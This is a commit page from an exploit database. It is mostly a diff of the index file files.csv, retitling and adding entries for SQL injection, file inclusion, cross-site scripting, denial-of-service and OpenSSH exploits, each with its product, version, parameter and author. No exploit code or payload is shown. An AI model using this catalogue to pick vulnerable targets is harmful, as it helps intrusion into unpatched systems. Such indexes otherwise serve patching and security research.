DB: 2016-12-24

3 new exploits

WinFTP Server 2.0.2 - (PASV) Remote Denial of Service
WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service

WinFTP Server 2.3.0 - (NLST) Denial of Service
WinFTP Server 2.3.0 - 'NLST' Denial of Service

vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)
vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)

OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation

X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)
X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)

OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading

X7 Chat 2.0 - (help_file) Remote Command Execution
X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution
Ultimate WebBoard 3.00 - (Category) SQL Injection
PromoteWeb MySQL - 'go.php id' SQL Injection
212Cafe Board 0.07 - (view.php qID) SQL Injection
Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection
PromoteWeb MySQL - 'id' Parameter SQL Injection
212Cafe Board 0.07 - 'qID' Parameter SQL Injection
The Gemini Portal - 'lang' Remote File Inclusion
RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection
ASPapp KnowledgeBase - 'catid' SQL Injection
The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion
RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection
ASPapp KnowledgeBase - 'catid' Parameter SQL Injection

X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion
X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion
CoAST 0.95 - (sections_file) Remote File Inclusion
Real Estate Manager - 'cat_id' SQL Injection
LnBlog 0.9.0 - (plugin) Local File Inclusion
PlugSpace 0.1 - (index.php navi) Local File Inclusion
MyCard 1.0.2 - (gallery.php id) SQL Injection
PowerPortal 2.0.13 - 'path' Local Directory Traversal
PHP-Lance 1.52 - (show.php catid) SQL Injection
Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution
CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion
Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection
LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion
PlugSpace 0.1 - 'navi' Parameter Local File Inclusion
MyCard 1.0.2 - 'id' Parameter SQL Injection
PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal
PHP-Lance 1.52 - 'catid' Parameter SQL Injection
Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution

ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection
ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection
Pro Chat Rooms 3.0.3 - (guid) SQL Injection
Pilot Group eTraining - 'news_read.php id' SQL Injection
BbZL.php 0.92 - (lien_2) Local Directory Traversal
Pro Chat Rooms 3.0.3 - SQL Injection
Pilot Group eTraining - 'news_read.php' SQL Injection
BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal

Arcadem Pro - 'articlecat' SQL Injection
Arcadem Pro - 'articlecat' Parameter SQL Injection
ArabCMS - 'rss.php rss' Local File Inclusion
FAQ Management Script - 'catid' SQL Injection
ArabCMS - 'rss.php' Local File Inclusion
FAQ Management Script - 'catid' Parameter SQL Injection

BookMarks Favourites Script - 'view_group.php id' SQL Injection
BookMarks Favourites Script - 'id' Parameter SQL Injection

BMForum 5.6 - (tagname) SQL Injection
BMForum 5.6 - 'tagname' Parameter SQL Injection
Crux Gallery 1.32 - (index.php theme) Local File Inclusion
phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution
RPortal 1.1 - (file_op) Remote File Inclusion
Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion
phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution
RPortal 1.1 - 'file_op' Parameter Remote File Inclusion

Link Trader - 'ratelink.php lnkid' SQL Injection
Link Trader - 'lnkid' Parameter SQL Injection
OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion
OpenX 2.6 - (ac.php bannerid) Blind SQL Injection
OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion
OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection

X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection
X7 Chat 2.0.5 - Authentication Bypass

Arcadem Pro 2.8 - (article) Blind SQL Injection
Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection

Link Trader - (lnkid) SQL Injection

phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)
phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)

PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing
PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing

Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion
Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion
BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting
BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting
BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting
BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting
BMForum 3.0 - 'topic.php' Cross-Site Scripting
BMForum 3.0 - 'forums.php' Cross-Site Scripting
BMForum 3.0 - 'post.php' Cross-Site Scripting
BMForum 3.0 - 'announcesys.php' Cross-Site Scripting
PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting
PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting
PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting
PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting
X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting
X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting
X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting
X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting
BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting
BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting
BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting
BMForum 5.6 - 'index.php' Cross-Site Scripting
BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting
BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting
Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting
Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting
Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting
Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting
Pilot Group eTraining - 'news_read.php' Cross-Site Scripting
Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting

OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting
OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting

Apache mod_session_crypto - Padding Oracle
This commit is contained in:
Offensive Security 2016-12-24 05:01:17 +00:00
parent 26b1e8b6ad
commit 897e1fa191
6 changed files with 639 additions and 93 deletions

114
files.csv
View file

@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port
2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0
2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0
2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0
@ -801,7 +801,7 @@ id,file,description,date,author,platform,type,port
6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0
6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0
6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0
6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
@ -811,7 +811,7 @@ id,file,description,date,author,platform,type,port
6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0
6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0
6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
@ -8733,6 +8733,7 @@ id,file,description,date,author,platform,type,port
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -14517,7 +14518,7 @@ id,file,description,date,author,platform,type,port
35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0
35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0
35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
@ -15192,6 +15193,7 @@ id,file,description,date,author,platform,type,port
40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16171,7 +16173,7 @@ id,file,description,date,author,platform,type,port
1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0
1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0
1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0
1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
@ -19544,69 +19546,69 @@ id,file,description,date,author,platform,type,port
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0
6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0
6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0
6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0
6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0
6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0
6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0
6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
6599,platforms/php/webapps/6599.txt,"Real Estate Manager - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps,0
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection",2008-09-27,CraCkEr,php,webapps,0
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' Parameter SQL Injection",2008-09-27,r45c4l,php,webapps,0
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' Parameter SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps,0
6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps,0
6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0
6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0
6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0
6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0
6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' Parameter SQL Injection",2008-09-29,"Hussin X",php,webapps,0
6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0
6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0
6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0
6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0
6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0
6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0
6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'view_group.php id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0
6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0
6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0
6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' Parameter SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution",2008-10-01,EgiX,php,webapps,0
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps,0
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Parameter Remote File Inclusion",2008-10-01,Kad,php,webapps,0
6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0
6650,platforms/php/webapps/6650.txt,"Link Trader - 'ratelink.php lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps,0
6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' Parameter SQL Injection",2008-10-01,"Hussin X",php,webapps,0
6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
@ -19979,7 +19981,7 @@ id,file,description,date,author,platform,type,port
